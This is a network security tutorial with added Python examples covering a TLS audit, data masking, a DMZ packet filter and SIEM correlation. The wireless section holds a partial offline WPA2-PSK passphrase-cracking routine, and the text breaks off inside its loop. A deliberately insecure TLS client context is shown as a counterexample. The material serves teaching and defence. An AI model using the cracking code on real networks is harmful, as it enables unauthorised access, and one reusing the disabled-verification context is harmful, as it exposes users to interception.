Network Security:
1. How does it work?
When a computer connects to another computer to exchange data, it becomes a member of a computer network. A network is made up of many different computers and components. There are different kinds of networks, such as LANs, WANs and MANs, built on media such as Ethernet and fibre optic, and they run over different communication protocols. An end user reaches the World Wide Web through an Internet connection: the user first connects to a local ISP (Internet Service Provider) and, after authenticating to it, is routed on to the web.
2. How do we benefit?
Whenever communication takes place over a network there is a chance of damage or loss: loss of data, loss of connectivity, or loss caused by failing hardware or software. Network security aims to prevent such losses and to minimise the damage when they do occur. It monitors the communication and connectivity running throughout the network, and it also takes in flow control, speed, timing and error-free delivery; for that, protocols and security software apply checksums and cryptographic integrity algorithms. Once these basic situations are handled, we have a fast, reliable and error-resistant computer network.
3. Types of Network Security:
Network security problems can be divided roughly into four closely intertwined areas: secrecy, authentication, non-repudiation and integrity control. Because there are many kinds of network, the kind and level of security required also varies. Security is needed both inside and outside the network, for inbound and outbound data movement, and whenever we are connected to the Internet we also need to secure the system itself and its connectivity.
a. Network Access Control
Network Access Control is about a user logging in to the network and reaching its resources. The user has to go through a secured login process and present credentials. Some of the protocols (and their well-known TCP ports) used while accessing network resources are:

Port      Protocol   Use
20, 21    FTP        File transfer
22        SSH        Remote login, replacement for Telnet
25        SMTP       Email: Simple Mail Transfer Protocol
80        HTTP       World Wide Web: Hyper Text Transfer Protocol
110       POP-3      Remote email access: Post Office Protocol Version 3
143       IMAP       Remote email access: Internet Message Access Protocol
443       HTTPS      Secure Web (HTTP over SSL/TLS)
554       RTSP       Media player control: Real Time Streaming Protocol
631       IPP        Printer sharing: Internet Printing Protocol

Note that FTP, POP-3 and IMAP on these ports carry passwords in clear text; in practice they are run inside TLS instead (SFTP or FTPS, POP3S on port 995, IMAPS on port 993), and SSH replaced Telnet for the same reason.
SSL/TLS: SECURE SOCKETS LAYER/TRANSPORT LAYER SECURITY
SSL builds a secure connection between two sockets, including:
1. Parameter negotiation between client and server.
2. Authentication of the server by the client.
3. Secret communication.
4. Data integrity protection.
Using such secured protocols we can allow or restrict users' access to network resources, and we can block attackers' attempts at data theft, program interruption and network attacks. In this way we secure banking and financial organisations, atomic and space facilities, scientific laboratories and so on.
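Item 2 above, authentication of the server by the client, is the service most often switched off in practice ("it works now" fixes that disable certificate checking). The following added example, written for this article and not code from the original page, audits a Python ssl.SSLContext for exactly that; the two context builders and the finding texts are this example's own.

```python
"""Audit a client-side ssl.SSLContext for the settings that make
"authentication of the server by the client" actually happen.

Added example for this article, not code from the original page.
Function names and finding texts are this example's own."""
import ssl


def audit_client_context(ctx: ssl.SSLContext) -> list:
    """Return a list of findings; an empty list means the context is acceptable."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        # Without CERT_REQUIRED the handshake succeeds against any certificate,
        # so an on-path attacker can present their own key and read everything.
        findings.append("server certificate is not verified (verify_mode != CERT_REQUIRED)")
    if not ctx.check_hostname:
        # A valid certificate issued for some other name still passes without this.
        findings.append("hostname is not checked against the certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("negotiation permits TLS older than 1.2; require TLSv1_2 or later")
    return findings


def weak_client_context() -> ssl.SSLContext:
    """The shape of the common 'fix' seen in code bases: verification turned off."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be disabled before verify_mode can be lowered
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """Server authenticated against the platform trust store, modern TLS only."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)  # CERT_REQUIRED + check_hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


if __name__ == "__main__":
    for name, ctx in (("weak", weak_client_context()), ("hardened", hardened_client_context())):
        print(name, audit_client_context(ctx) or "OK")
```

Run the audit over every context an application builds; a non-empty finding list on a production client means item 2 of the list above is not being provided at all, whatever cipher is negotiated.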
b. Antivirus and Anti-malware software
Antivirus software is a program like any other; its job is to let the normal programs run properly without interference. It identifies and removes harmful code (malware) that disturbs not only application software but also the operating system. It runs on a strict routine, scanning when the system boots or periodically at fixed times, and on finding malicious files it quarantines or deletes them and removes the registry entries and other persistence they created.
Antivirus products provide protection against malware, spyware, theft, intrusion and ransomware, and many also offer parental controls for students. Such protection is available for offline as well as online systems.
c. Application security
Application security in a network starts with what kind of network the application serves, because the network is wide, is made up of many smaller networks, and is growing rapidly. The application is the driving force behind data flowing through the network, so its functionality and availability at a given moment are the real issues to deal with: today's networks are application oriented and application dependent. In the early days a data resource was accessed from a local database on the LAN. Now the network is far more complicated and the same database is accessed from many places, so it must be available to many clients at the same time, and a dedicated application able to serve all those data resources concurrently is needed at both ends, client and server. The network architecture therefore has to be able to adapt to, manage and deploy complicated applications, and this requirement is prompting the transition from traditional networks to software defined networking (SDN). Juniper Networks, for example, is building network infrastructure intended to let organisations move to virtualised networks while keeping access to existing data and applications and preserving their investment in network hardware.
These days data centres are migrating to cloud-based infrastructure, and so the applications in use are cloud based as well. A single retail sale exercises the whole cloud network: the barcode scanned at the sales terminal belongs to the cloud data centre, and the card-swiping POS machine reconciles the customer's financial data with the store's data centre, which holds the inventory and finance sections; the company also sells online. The infrastructure thus becomes three-tier, with a web front end, a business logic tier and a back-end data store, all running on racks of servers. The multi-tiered nature of these applications requires additional network services to secure them, covering application security, functionality and availability.
d. Behavioural analytics
Behavioural analytics looks at how the network normally behaves, so that a deviation from that baseline can be recognised. The network should be responsive when hardware, software or program components are added to it: it should be compatible and adaptable to a new environment, and it should react quickly when an incompatible component or a malicious program is added, discarding it immediately. Only in that way is a balanced network maintained.
There are multiple tiers of security concern over network behaviour, starting from high-end products such as VSAT terminals, mainframe computers, servers, routers, modems and IPv4/IPv6 devices down to the end user's computer. These components belong to different networks (LAN, WAN, MAN, Wi-Fi, fibre optic, Ethernet, cloud) running over different communication protocols. The present network is the outcome of evolution: its major issue is its global presence, which requires large-scale maintenance and care, and its tendency to expand, which raises compatibility issues with the existing network. The smallest cable incompatibility can cause communication malfunction throughout the network.
In the 21st century, networks and data centres belonging to private, public, corporate, defence, educational, space and scientific organisations are migrating to cloud-based networks. When they do, issues of data security, data integrity, data resources, communication security and cost effectiveness are raised, and both the existing network and the cloud-based one have to go through compatibility issues that can only be understood through behavioural analytics.
e. Data loss prevention
A computer network is made of many computers and network components, and what they all have in common is the job of moving data securely and without loss. The network administrator does everything possible to overcome the problem of data loss. Data security requires multilevel consultation with the people responsible for the network, who have to answer what kind of data is handled, where it travels, and which types and levels of breach must be stopped. This includes people from different territories, different service networks and different levels of the hierarchy: the seller's network, the buyer's network and the intermediate service provider's network. In short, with a general data protection system we can secure the data, and assessing security risks, preventing attacks, monitoring to detect breaches and the quality of protection are the key ingredients of that system. We protect data by reducing access to it: privileged and fine-grained user accounts so that access is tied to a person and a purpose, and minimised data exposure so that the chance of loss is reduced. Data auditing is also fruitful in protecting data.
To prevent communication and data loss, various methods are employed, such as encrypting data to secure it from hackers. With data scrambling and fewer links we can hide data partially, so that intentionally or accidentally the data is less visible, or invisible, to an entity. Different communication protocols, algorithms and topologies are employed to prevent communication and data loss, and different transmission media and methods to speed up communication and overcome communication loss. This is the way to obtain the key security objectives: the three categories of assessment, detection and prevention reduce data theft and data loss. Data security should be built in, or on by default, in the system, and it should be centralised and comprehensive throughout the system.
Threats to a database arise from several entry points: the operating system, the database itself and the applications. Threats need not come from outside; people associated with the organisation can damage the system from inside through the same entry points. By locating the personal data that must be secured, by creating security profiles and by restricting the database to privileged users, we can secure the database perimeter. With data masking and sub-setting we can produce a version of the database that outside users are allowed to access: they are given a copy of the database in which the personal details have been tailored.
Thus by securing our database servers, application servers, database firewalls, network encryption, gateways and other devices we can restrict data loss.
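The masking and sub-setting step described above, as an added example written for this article (not code from the original page): a copy of a record is cut down to the fields an outside user may see, and card numbers and e-mail addresses in what remains are masked. The record layout, field names, permitted-field list and sample values are all constructed for the example; the Luhn check separates real card numbers from order references of the same shape.

```python
"""Data masking and sub-setting for a copy of records handed to outside users.

Added example for this article, not code from the page. Record layout,
field names and sample rows are constructed assumptions."""
import re

# 13-19 digits, optionally separated by spaces or hyphens, starting and ending on a digit
PAN_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: true for real card numbers, false for most look-alike ids."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(text: str) -> str:
    """Replace Luhn-valid card numbers with stars, keeping the last four digits."""
    def repl(m):
        raw = m.group(0)
        digits = re.sub(r"\D", "", raw)
        if not luhn_ok(digits):
            return raw          # an order id or similar: leave it alone
        return "*" * (len(digits) - 4) + digits[-4:]
    return PAN_RE.sub(repl, text)


def mask_email(text: str) -> str:
    """Keep the first character and the domain: a***@example.com."""
    return EMAIL_RE.sub(lambda m: m.group(0)[0] + "***@" + m.group(0).split("@", 1)[1], text)


# assumed policy: fields an outside party (e.g. a logistics partner) may see at all
OUTSIDE_FIELDS = ("order_id", "customer_email", "note")


def outside_copy(record: dict) -> dict:
    """Sub-set the record to the permitted fields, then mask what remains."""
    out = {k: record[k] for k in OUTSIDE_FIELDS if k in record}
    for k, v in out.items():
        if isinstance(v, str):
            out[k] = mask_email(mask_pan(v))
    return out


if __name__ == "__main__":
    sample = {"order_id": 7, "customer_email": "bob@example.org",      # constructed row
              "card": "4111111111111111", "note": "paid with 4111-1111-1111-1111"}
    print(outside_copy(sample))
```

Sub-setting removes whole fields (the card column never leaves), and masking handles the data that leaks into free-text fields, which is where most copied databases expose card numbers.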
f. Email security
E-mail is sent between two points, but when it travels over the network it passes through various computers before reaching its destination, and any of those computers can read it. So e-mail is not a secure means of communication by itself, and we need a secure way to handle it. Using PGP (Pretty Good Privacy) or S/MIME (Secure Multipurpose Internet Mail Extensions) we can secure e-mail between the two end points, the sender and the receiver.
PGP:
PGP is a complete security package for e-mail which provides authentication, privacy, digital signatures and compression. It is simple and its source code was published; free implementations of the OpenPGP standard are available on the Internet for UNIX, Linux, Windows and Mac OS.
The original PGP encrypted data with a block cipher called IDEA (International Data Encryption Algorithm), which uses 128-bit keys; current OpenPGP implementations normally use AES. PGP supports several RSA key lengths and it is up to the user to select the appropriate one. The classic descriptions of the lengths are:
1. Casual (384 bits): can be broken easily today.
2. Commercial (512 bits): breakable by three-letter organisations.
3. Military (1024 bits): described at the time as unbreakable by anyone on earth, but 1024-bit RSA is no longer considered safe and should not be used for new keys.
4. Alien (2048 bits): described as unbreakable by anyone on other planets either; 2048 bits is today's common minimum, with 3072 or 4096 bits recommended for long-lived keys.
S/MIME:
S/MIME provides authentication, data integrity, secrecy and non-repudiation. It is also quite flexible, supporting a variety of cryptographic algorithms. Not surprisingly, given the name, S/MIME integrates well with MIME, allowing all kinds of messages to be protected; a variety of new MIME headers are defined for it.
g. Firewalls
Computers are added to networks every moment, in corporate houses, multinational companies, government organisations, educational institutions, defence organisations, scientific laboratories and so on. Adding a single new computer to a network or LAN can bring a virus or other threat to the whole network, and any single computer can be responsible for bringing down the whole network or LAN inside a company. IPsec cannot stop malicious bytes entering the network either: it protects the confidentiality and integrity of packets in transit, not what the packets carry.
A firewall is a modern adaptation of an old medieval security standby: digging a deep moat around a castle, so that everyone passing in or out has to cross one bridge where they are inspected by the guards. In the same way, the LANs of a company may be connected in an arbitrary way, but all inbound and outbound traffic passes through the firewall. A firewall acts as a packet filter: the filter is configured with rules stating which packets are allowed in or out, keyed on source and destination address and, for TCP/IP, on the port number carried alongside the IP address. We can define which ports and destinations packets are allowed to reach through the firewall.
The other practice is to implement a demilitarized zone (DMZ), where the web server is placed outside the secured LAN. The firewall is then configured so that only requests to the web server's own port (80 or 443) are passed in from outside, and any attempt by the web server to open a connection into the internal LAN is turned down. That is how a network layer packet filter is implemented. Firewalls can also look into transport and application layer data when filtering, which matters because some peer-to-peer applications select ports dynamically to avoid being easily spotted; a firewall that looks only at port numbers is breached this way, so it has to inspect what the packets carry. The firewall is only the entry-level checkpoint: each system belonging to the network should also turn on its own host firewall.
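The DMZ policy described above, as an added example written for this article (not code from the original page): a toy stateful packet filter in Python that tracks connections it has admitted, so that return traffic is allowed while an unsolicited packet, or a web server trying to open a connection into the LAN, is dropped. The zone addresses, the rule table and the packet trace are constructed for the example; a real firewall also tracks sequence numbers, timeouts and UDP/ICMP state.

```python
"""Toy stateful packet filter implementing a DMZ layout.

Added example for this article, not code from the original page. Zone
addressing, rules and packets are constructed assumptions."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

ZONES = {                                   # assumed addressing
    "inside": ip_network("10.0.0.0/24"),    # internal LAN
    "dmz":    ip_network("192.0.2.0/24"),   # web server lives here
}


def zone_of(addr: str) -> str:
    ip = ip_address(addr)
    for name, net in ZONES.items():
        if ip in net:
            return name
    return "outside"


# (from_zone, to_zone, allowed destination ports); None = any port.
# No ("dmz", "inside") and no ("outside", "inside") entry: a compromised
# web server cannot open connections into the LAN, nor can the Internet.
RULES = [
    ("outside", "dmz",     {80, 443}),      # public web server only
    ("inside",  "dmz",     None),
    ("inside",  "outside", None),
    ("dmz",     "outside", {53, 443}),      # DNS and patching, nothing else
]


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False


class StatefulFilter:
    def __init__(self):
        self.table = set()      # admitted flows as (client, cport, server, sport)

    def decide(self, p: Packet) -> str:
        fwd = (p.src, p.sport, p.dst, p.dport)
        rev = (p.dst, p.dport, p.src, p.sport)
        if fwd in self.table or rev in self.table:
            return "ALLOW(established)"     # traffic of a flow we already admitted
        if not (p.syn and not p.ack):
            return "DROP(no-state)"         # ACK or data with no known connection
        src_zone, dst_zone = zone_of(p.src), zone_of(p.dst)
        for fz, tz, ports in RULES:
            if (fz, tz) == (src_zone, dst_zone) and (ports is None or p.dport in ports):
                self.table.add(fwd)         # remember the flow so replies get through
                return "ALLOW(new)"
        return "DROP(policy %s->%s:%d)" % (src_zone, dst_zone, p.dport)


if __name__ == "__main__":
    fw = StatefulFilter()
    trace = [                                # constructed packets
        Packet("198.51.100.7", 40000, "192.0.2.10", 443, syn=True),       # client -> web
        Packet("192.0.2.10", 443, "198.51.100.7", 40000, syn=True, ack=True),
        Packet("192.0.2.10", 5555, "10.0.0.5", 5432, syn=True),           # web -> LAN db
        Packet("198.51.100.7", 40002, "10.0.0.5", 22, ack=True),          # spoofed reply
    ]
    for p in trace:
        print(p.src, "->", p.dst, p.dport, fw.decide(p))
```

The two drop branches are the ones that matter: "no-state" is what stops forged replies aimed at internal hosts, and the missing dmz->inside rule is what contains a compromised web server.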
Sometimes a security breach is carried out not to steal data but to shut down the network. This is called a Denial of Service (DoS) attack. In a Distributed Denial of Service (DDoS) attack a number of already compromised computers attack a common target, and in this case it is hard to identify the attackers, because the computers taking part belong to unsuspecting users.
h. Intrusion prevention system
Intrusion detection and prevention is a key ingredient of network security. In any network, data availability, data security and data flow define the efficiency of the network. Data security applies down to the bit or byte level and across the various layers of the OSI model. Security protocols such as IPsec, and secure login procedures over SSL/TLS, are employed for entry-point security, so that data integrity and secure communication between client and server are established only after successful authentication.
We also design and define a special firewall system dedicated to intrusion prevention, where inbound and outbound traffic is checked at the bit level. Data auditing is carried out against the operating system and the system database, and the auditing system raises an alert to the firewall if malicious software is trying to intrude on the database.
Data encryption, data encapsulation, data scrambling and data hiding are employed as well, and data is sorted into public, private and protected classes. That way we can restrict direct access to the database and partially hide data from the end user. This kind of protection is necessary because the threat is not only from outside; people associated with the system also bring in, or send out, malicious code through the system. We enforce privileged access levels on priority databases and develop an intrusion countermeasure system in which the rules and regulations are defined, and we can enforce penalties on those responsible for unlawful and suspicious activity. Antivirus software capable of handling malware, network intrusion and data theft is now available for domestic and commercial users, but for a large infrastructure the security system has to be on by default, within and throughout the system comprehensively: a security module within the network system.
i. Mobile device security
Mobile devices, as their name says, are associated with the mobile network. They can be smartphones, smart watches, laptops, printers, telephony or gaming devices, connected wirelessly through the cell phone network (3G/4G) or an 802.11 Wi-Fi hotspot, which is available at malls, theatres, stadiums, offices, institutions and so on. One can get online or stay connected away from home or the office, while travelling by road, air or sea.
An electronic reader downloads daily newspapers, subscribed newsletters and articles. Mobile devices are GPS enabled; taxi companies like Uber run over mobile applications, and even parking meter payments are made through Wi-Fi enabled electronic meters. The web has become a big online market where small and large companies sell their products through mobile applications; we can order groceries through an application, pay, and get a receipt. So over Wi-Fi networks we do business, banking, financial transactions, stock purchases and so on. In an embedded system a piece of computer hardware monitors a system such as an air conditioner or geyser and communicates with a mobile phone to turn it on or off or to update its status, and in the automation industry we can operate and monitor a system even when we are away from it. Wi-Fi networks are also used in military and defence, where a single message or command can start a war in a fraction of a second, so the security measures needed for these networks are of a very high level. We can track these devices over the network using their IPv4 or IPv6 addresses.
We have 2G/3G/4G mobile networks and Wi-Fi hotspots for wireless communication. The mobile networks belong to the Advanced Mobile Phone System (AMPS), Global System for Mobile communication (GSM), Universal Mobile Telecommunication System (UMTS), General Packet Radio Service (GPRS) and Long Term Evolution (LTE) families, alongside Wi-Fi (802.11) and WiMAX (Worldwide Interoperability for Microwave Access, 802.16 broadband wireless), which uses Orthogonal Frequency Division Multiple Access (OFDMA in 802.16e mobile WiMAX; OFDM in 802.16a fixed WiMAX). To speed up communication a Wi-Fi network can transmit four data streams from four antennas at once and separate them at the receiver using Multiple Input Multiple Output (MIMO) techniques. The security threat to these networks is that data transmitted over the air can easily be received by other computers, so encrypted communication with Wi-Fi Protected Access 2 (WPA2) is used, and SSL/TLS or IPsec on top of it gives authenticated, secure communication end to end. The mobile code that these devices download and execute (Java applets, ActiveX controls and JavaScript) raises its own security issues, which are covered under Web security below.
j. Network segmentation
A computer network is made up of many network components. Each has its own identity, work function, priority, privilege and hierarchy, and each has a role to play in making the network run. If we can distinguish a network inside the network, we can also identify the components inside that network, down to the bit or byte level of the data frames; we call these network segments.
The environment of a network segment changes as the network infrastructure changes, but segments share one common goal: to speed up data flow and make communication error free, and for that processing is distributed throughout the network. We have different kinds of networks: Personal Area Network, Local Area Network, Wide Area Network, Metropolitan Area Network, the Internet and cloud-based networks, of which the cloud-based network is the latest and state of the art. Each repeater, hub, bridge, switch, router and gateway bounds a network segment, and each segment is well defined. Different communication methods (Ethernet, fibre optic, DSL, VSAT, etc.) are employed, each with its own communication protocols.
In cloud-based infrastructure there are basically three deployment types, 1. public, 2. private and 3. hybrid, and three basic service models: 1. Software as a Service (SaaS), 2. Platform as a Service (PaaS) and 3. Infrastructure as a Service (IaaS). Putting this infrastructure into practice for business is costly, because each segment or device belonging to the network is charged on an hourly basis within a monthly billing cycle, and each CPU is counted for the services. In IaaS, for example, the network segment is a standard or high-speed CPU in a virtual server, and a virtual private server requires at least two hosts; the same applies to virtual servers and virtual private servers for SAP. Operating system, middleware, storage and networking components or segments are all counted on an hourly basis. Properly configured, cloud services can be a safe, secure and reliable data communication infrastructure.
It is good that the segments of a network are alike in kind, each with its own work definition. It is this property of network segments that lets a network sustain itself once configured. As the network keeps growing, maintenance and care are a routine requirement. All future network models are designed so that they complement, and are compatible with, the existing network, so each network segment can become a key to defining future networks.
k. Security information and event management
Security information and event management (SIEM) in the context of network security means collecting the security-relevant events from every point where data and data flow are secured, and bringing them together so that they can be correlated and acted on. For securing network data we employ different algorithms, topologies, protocols, communication media and methods. With modern equipment we implement layer-based communication and peer-to-peer communication, and so we have to secure data at the bit/byte level; we have to manage the events of data security and data communication where they are actually carried out. Only in that way can we communicate effectively.
We have different communication junctions where communication is carried out, such as routers, switches, bridges, tunnels, firewalls and gateways, so we are managing event ingredients such as protocols, algorithms and topologies at each particular node. An intruder may breach security by cracking our data, and to secure it we have to take countermeasures at the basic level. The IPsec protocol carries security information in its own headers, and cryptography secures the data more generally: there is an encryption key at the sender's end and a decryption key at the receiver's end, the transmitted cipher text is protected by these keys, and fresh session keys should be used every time. Antivirus software provides security at the operating system level.
As soon as we create a tunnel across a Metropolitan Area Network for a company with corporate offices at various locations, an employee can stay in touch with the office while roaming, so secure login over SSL/TLS is employed, and with a firewall we can monitor inbound and outbound data and restrict unwanted communication.
Thus security information and event management is a key parameter for efficient network communication and data protection.
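What a SIEM actually does with the events collected from those junctions, as an added example written for this article (not code from the original page): log lines from two different sources (a firewall and an SSH daemon on a host) are normalised into one event shape and then correlated with a single rule, repeated authentication failures from one source followed by a success from the same source within a short window. The log lines, formats, thresholds and window are all constructed assumptions for the example.

```python
"""Event normalisation and correlation across two log sources.

Added example for this article, not code from the original page. The log
lines below are constructed; formats, threshold and window are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# constructed sample events from two sources, already in time order
SAMPLE_LOGS = """\
2024-05-01T10:00:01 fw01 DENY 203.0.113.9 -> 10.0.0.5:22
2024-05-01T10:00:02 fw01 ALLOW 203.0.113.9 -> 10.0.0.5:22
2024-05-01T10:00:03 host5 sshd: Failed password for admin from 203.0.113.9
2024-05-01T10:00:04 host5 sshd: Failed password for admin from 203.0.113.9
2024-05-01T10:00:05 host5 sshd: Failed password for root from 203.0.113.9
2024-05-01T10:00:06 host5 sshd: Failed password for admin from 203.0.113.9
2024-05-01T10:00:07 host5 sshd: Failed password for admin from 203.0.113.9
2024-05-01T10:00:09 host5 sshd: Accepted password for admin from 203.0.113.9
2024-05-01T10:00:10 host5 sshd: Failed password for bob from 198.51.100.4
2024-05-01T10:30:00 host5 sshd: Accepted password for bob from 198.51.100.4
"""

FW_RE = re.compile(r"^(\S+) (\S+) (ALLOW|DENY) (\S+) -> (\S+):(\d+)$")
SSH_RE = re.compile(r"^(\S+) (\S+) sshd: (Failed|Accepted) password for (\S+) from (\S+)$")


def normalise(line: str):
    """Turn a raw line from either source into one common event dict (or None)."""
    m = SSH_RE.match(line)
    if m:
        ts, host, result, user, src = m.groups()
        return {"ts": datetime.fromisoformat(ts), "host": host, "src": src,
                "kind": "auth_fail" if result == "Failed" else "auth_ok", "user": user}
    m = FW_RE.match(line)
    if m:
        ts, host, action, src, dst, port = m.groups()
        return {"ts": datetime.fromisoformat(ts), "host": host, "src": src,
                "kind": "fw_" + action.lower(), "dst": dst, "port": int(port)}
    return None


def correlate(lines: str, threshold: int = 5, window: timedelta = timedelta(minutes=5)):
    """Rule: at least `threshold` auth failures from one source inside `window`,
    then a success from the same source = probable brute-force compromise.
    Returns a list of (source, user, host, failure_count) alerts."""
    fails = defaultdict(list)
    alerts = []
    for line in lines.splitlines():
        ev = normalise(line)
        if not ev:
            continue                              # unknown format: a real SIEM would count these
        if ev["kind"] == "auth_fail":
            fails[ev["src"]].append(ev["ts"])
        elif ev["kind"] == "auth_ok":
            recent = [t for t in fails[ev["src"]] if ev["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append((ev["src"], ev["user"], ev["host"], len(recent)))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOGS):
        print("ALERT brute-force success:", alert)
```

The firewall events are parsed but not used by this one rule; in practice the same normalised stream feeds many rules (the DENY followed by ALLOW for the same source and port, for instance, is what a rule for "scanner found an open door" would key on), which is the reason to normalise first and correlate second.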
l. VPN
The term VPN (Virtual Private Network) is highlighted for the functionality and features that give a private network's security while running over a public network. A true private network is made up of computers and dedicated leased communication lines across the company's widespread or global offices; data security is excellent, but it is very costly. In a Virtual Private Network we instead overlay our secured private network on the web, i.e. the public Internet, using firewalls, tunnels and IPsec with ESP (Encapsulating Security Payload) in tunnel mode.
We create a tunnel between a pair of firewalls at the office networks, through which all data passes, including the services, modes, algorithms and keys agreed for it. When the system comes up, each firewall has to negotiate the parameters of its security association (SA). Using IPsec tunnelling we can carry all aggregate traffic between the pair of firewalls over a single authenticated, encrypted SA of the office network. This provides integrity control, secrecy and even considerable immunity to traffic analysis. IPsec encapsulating the original IP packet inside a new one separates the data flowing through the public network from the private network.
The other option is a VPN laid across the ISP's network to the pair of firewall points of the office network. The network administrator configures and monitors the VPN gateways, while the ISP's administrator configures the MPLS (Multiprotocol Label Switching) path. Here the VPN runs over the Internet with completely isolated security software, which is transparent to all user software.
m. Web security
There are three major issues related to web security:
1. How are objects and resources named securely?
2. How can secure and authenticated connections be established?
3. What happens when a web site sends the client executable code?
Web security is a major source of chaos in the web world. The problem arises with the day-to-day expansion and upgrading of the network. Major corporate houses like Cisco, SAP, Oracle and Citrix publish whitepapers on the issue and organise workshops and seminars to overcome the threat posed by network invaders. These are called hackers, or more precisely crackers; in their world they are sophisticated and ingenious programmers.
The threats they pose include defacing the web pages of web sites; slowing down network traffic by flooding a particular web site with packets from a number of computers; breaking into the secured database of a company; cracking banking system codes and clearing account balances; and being responsible for a fall in a company's stock price.
The areas related to web security are: a. secure naming, b. DNS spoofing, c. DNSSEC.
DNSSEC is conceptually extremely simple and is based on public key cryptography. DNSSEC offers three fundamental services:
1. Proof of where the data originated.
2. Public key distribution.
3. Transaction and request authentication.
Secure Sockets Layer (SSL)
After secure naming comes the secure connection. Netscape Communications Corp. came up with SSL as the solution for securing banking and financial transactions, and Netscape, Mozilla and Internet Explorer all used it.
SSL builds a secure connection between two sockets, including the four services already listed under Network Access Control above: parameter negotiation between client and server, authentication of the server by the client, secret communication and data integrity protection.
A browser using SSL goes through the following layers:
Application (HTTP)
Security (SSL)
Transport (TCP)
Network (IP)
Data link (PPP)
Physical (modem, ADSL, cable TV)
TLS (Transport Layer Security) is the IETF standard derived from SSL version 3; SSL itself is obsolete and TLS 1.2 or later should be used.
Mobile Code Security:
In the early days of the web there were simple web pages. Now there are Java applets, ActiveX controls and JavaScript to download, and so security issues arise with downloading and executing mobile code.
Browser Extensions:
Browser extensions, add-ons and plugins give the browser compatibility with applications such as PDF and Flash animations. There can be malicious add-ons and plugins, so they should be downloaded from trusted sources only.
Virus:
A virus is a simple program that executes when it is called upon. It is an unwanted element that arrives with unreliable web applications, e-mail attachments or malicious software. When an infected application runs, control passes to the virus program, which infects other applications such as e-mail and tries to spread to other computer systems. Some viruses start when the computer boots and destroy the computer system. So operating systems now come with secure microkernels and tight compartmentalisation of users, processes and resources.
n. Wireless security
Systems designed with VPNs and firewalls are secure ones and provide the enhanced features of a safe system. But a wireless system transmits radio packets right over the firewall in both directions. Wireless is a snooper's dream come true: free data without having to do any work. Therefore a wireless system requires more security than a wired one.
802.11 provides security at the data link level. The purpose of 802.11i is to prevent a third node from receiving or interfering with the communication carried out between two other nodes. It is also known by its trade name WPA2, i.e. Wi-Fi Protected Access 2. Plain WPA was an interim scheme that implements a subset of 802.11i and should be avoided in favour of WPA2. 802.11i is used for corporate networks as well as for home use. For corporate use it uses a client-server arrangement with the 802.1X protocol, and the client-server authentication is carried out with the Extensible Authentication Protocol (EAP). For home use there is no authentication server; instead a single pre-shared password is issued to every client for authentication. So the home mode of 802.11i has less secure authentication and communication: the one passphrase is shared by everyone, and anyone who captures a station's handshake can test guesses against it offline.
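Why the home mode is weaker, as an added example written for this article (not code from the original page): the pre-shared key is derived from the passphrase and SSID, the handshake MIC is keyed from that, and both the nonces and the MIC cross the air in clear, so a passive capture is enough to run an offline dictionary attack. The "capture" below is fabricated from a known passphrase so that the example runs offline; the SSID, MAC addresses, nonces, EAPOL frame bytes and wordlist are all assumed values.

```python
"""Offline dictionary attack against a WPA2-PSK 4-way handshake.

Added example for this article, not code from the original page. The
captured handshake is constructed here from a known passphrase; SSID,
MACs, nonces and the EAPOL frame are assumed values."""
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(5))           # 5 * 20 bytes >= 64
    return out[:64]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces);
    its first 16 bytes are the KCK, which keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2 (AES-CCMP) handshake: MIC = HMAC-SHA1-128 over the frame with its MIC field zeroed
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# constructed "captured" handshake: everything a passive sniffer sees in clear
CAPTURE = {
    "ssid": "HomeNet",
    "aa": bytes.fromhex("001122334455"),        # AP MAC (assumed)
    "spa": bytes.fromhex("66778899aabb"),       # station MAC (assumed)
    "anonce": bytes(range(32)),                 # stand-in nonces
    "snonce": bytes(range(32, 64)),
    "eapol_msg2": bytes(121),                   # message 2/4 with the MIC field zeroed
}


def build_capture(true_passphrase: str) -> dict:
    """Fabricates CAPTURE's MIC for the example; an attacker reads it off the air."""
    cap = dict(CAPTURE)
    kck = derive_kck(pmk_from_passphrase(true_passphrase, cap["ssid"]),
                     cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
    cap["mic"] = eapol_mic(kck, cap["eapol_msg2"])
    return cap


def crack_psk(cap: dict, wordlist) -> Optional[str]:
    """Derive the KCK for each candidate passphrase and compare the resulting MIC."""
    for candidate in wordlist:
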